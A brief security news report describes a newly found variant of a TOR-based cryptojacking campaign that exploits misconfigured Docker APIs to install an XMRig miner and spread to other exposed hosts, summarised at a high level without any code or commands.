Cybersecurity researchers at Akamai have discovered a new variant of a cryptojacking campaign targeting exposed Docker APIs, building on a previous report by Trend Micro in June 2025.
The attackers use the TOR network for anonymity and exploit misconfigured Docker instances to install an XMRig cryptocurrency miner. The campaign blocks other actors from accessing the vulnerable Docker APIs, likely to maintain exclusive control over infected machines.
The attack starts by launching a Docker container with access to the host system, running a Base64-encoded payload that downloads a shell script from a hidden TOR (.onion) site. The script modifies SSH settings for persistence and installs reconnaissance tools like masscan and torsocks.
The malware drops a Go-based tool that scans the internet for other exposed Docker APIs on port 2375 and attempts to spread. It also checks for ports 23 (Telnet) and 9222 (Chrome’s remote debugging), though these functions aren’t yet active.
Notably, the malware parses user logins and includes code likely generated by an AI model, as it features emojis to indicate active sessions. Data collected is sent to a TOR endpoint named httpbot/add, indicating a possible botnet used for data theft or DDoS attacks.